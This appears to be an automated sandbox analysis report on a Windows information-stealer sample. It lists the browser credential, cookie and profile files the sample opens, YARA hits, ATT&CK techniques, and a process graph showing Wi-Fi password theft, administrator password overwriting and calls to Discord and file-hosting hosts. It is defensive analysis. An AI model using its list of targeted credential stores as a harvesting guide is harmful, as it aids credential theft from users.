            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500
            Source: Yara match | File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Source: Yara match | File source: 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Source: Yara match | File source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Source: Yara match | File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 2_2_00007FFD93D12B5D bind,WSAGetLastError,2_2_00007FFD93D12B5D
Techniques per tactic, in the report's order (bracketed numbers are the report's signature-count badges):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Windows Management Instrumentation [331]; Native API [2]; Command and Scripting Interpreter [122]; Service Execution [1]; PowerShell [2]; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading [1]; Valid Accounts [1]; Windows Service [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading [1]; Valid Accounts [1]; Windows Service [1]; Process Injection [11]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools [2]; Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [21]; Software Packing [11]; DLL Side-Loading [1]; Masquerading [1]; Valid Accounts [1]; Virtualization/Sandbox Evasion [141]; Process Injection [11]; Dynamic API Resolution
Credential Access: OS Credential Dumping [1]; GUI Input Capture [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery [12]; System Network Connections Discovery [2]; File and Directory Discovery [2]; System Information Discovery [45]; Security Software Discovery [561]; Process Discovery [2]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; Remote System Discovery [1]; System Network Configuration Discovery [31]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data [1]; Data from Local System [3]; GUI Input Capture [1]; Clipboard Data [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer [3]; Encrypted Channel [11]; Non-Application Layer Protocol [4]; Application Layer Protocol [5]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Data Encrypted for Impact [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1543665; Sample: SecuriteInfo.com.FileRepMal...; Startdate: 28/10/2024; Architecture: WINDOWS; Score: 100

Node 2 (sample start)
  DNS/IP: store1.gofile.io; ip-api.com; 3 other IPs or domains
  Signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Sigma detected: Capture Wi-Fi password; 8 other signatures
  Started process 10: SecuriteInfo.com.FileRepMalware.22561.28030.exe (60)
    Dropped: C:\Users\...\_quoting_c.cp310-win_amd64.pyd (PE32+); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\sqlite3.dll (PE32+); 30 other files (29 malicious)
    Signatures: Modifies the windows firewall; Tries to harvest and steal WLAN passwords; Gathers network related connection and port information; Potentially malicious time measurement code found
    Started process 14: SecuriteInfo.com.FileRepMalware.22561.28030.exe (107)
      DNS/IP: ip-api.com 208.95.112.1, 49721, 80 TUT-ASUS United States; discord.com 162.159.136.232, 443, 49766, 49767 CLOUDFLARENETUS United States; 4 other IPs or domains
      Dropped: C:\Users\user\AppData\Local\...xela.exe (PE32+); C:\Users\user\AppData\...\ZQIXMVQGAH.xlsx (ASCII); C:\Users\user\AppData\...\PWCCAWLGRE.jpg (ASCII); 8 other malicious files
      Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
      Started process 19: cmd.exe (1)
        Signatures: Encrypted powershell cmdline option found; Bypasses PowerShell execution policy; Uses netstat to query active network connections and open ports; 3 other signatures
        Started process 28: conhost.exe
      Started process 22: cmd.exe
        Signatures: Overwrites the password of the administrator account; Gathers network related connection and port information; Performs a network lookup / discovery via ARP
        Started process 30: systeminfo.exe
          Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Started process 47: WmiPrvSE.exe
        Started process 33: net.exe
          Signatures: Overwrites the password of the administrator account
          Started process 49: net1.exe
        Started process 35: net.exe
          Started process 51: net1.exe
        Started 16 other processes (node 43)
          Started process 55: quser.exe; process 57: net1.exe; process 59: net1.exe; process 61: net1.exe
      Started process 24: cmd.exe (1)
        Started process 37: WMIC.exe (1)
          Signatures: Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes); Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
        Started process 39: conhost.exe
      Started 15 other processes (node 26)
        Signatures: Tries to harvest and steal WLAN passwords
        Started process 41: cmd.exe
          Started process 53: chcp.com
        Started 28 other processes (node 45)
          Started process 63: chcp.com

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.FileRepMalware.22561.28030.exe | 50% | ReversingLabs | Win64.Adware.RedCap
SecuriteInfo.com.FileRepMalware.22561.28030.exe | 100% | Avira | HEUR/AGEN.1306040

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe | 100% | Avira | HEUR/AGEN.1306040
C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe | 50% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_decimal.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_hashlib.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_multiprocessing.pyd | 0% | ReversingLabs
